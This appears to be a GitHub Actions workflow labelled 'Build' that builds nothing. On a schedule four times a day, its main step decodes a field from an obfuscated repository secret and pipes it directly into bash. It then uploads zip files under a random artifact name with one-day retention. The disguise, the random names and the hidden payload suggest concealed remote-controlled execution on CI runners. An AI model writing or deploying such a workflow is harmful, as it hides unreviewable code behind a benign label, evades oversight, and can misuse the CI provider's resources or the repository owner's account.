name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '9 4,10,16,22 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          kfrid7: ${{ secrets.kfrid7 }}
        run: |
          printf '%s' "$kfrid7" | jq -r .uiejn4 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: B0FbrTmG
          path: "*.zip"
          retention-days: 1
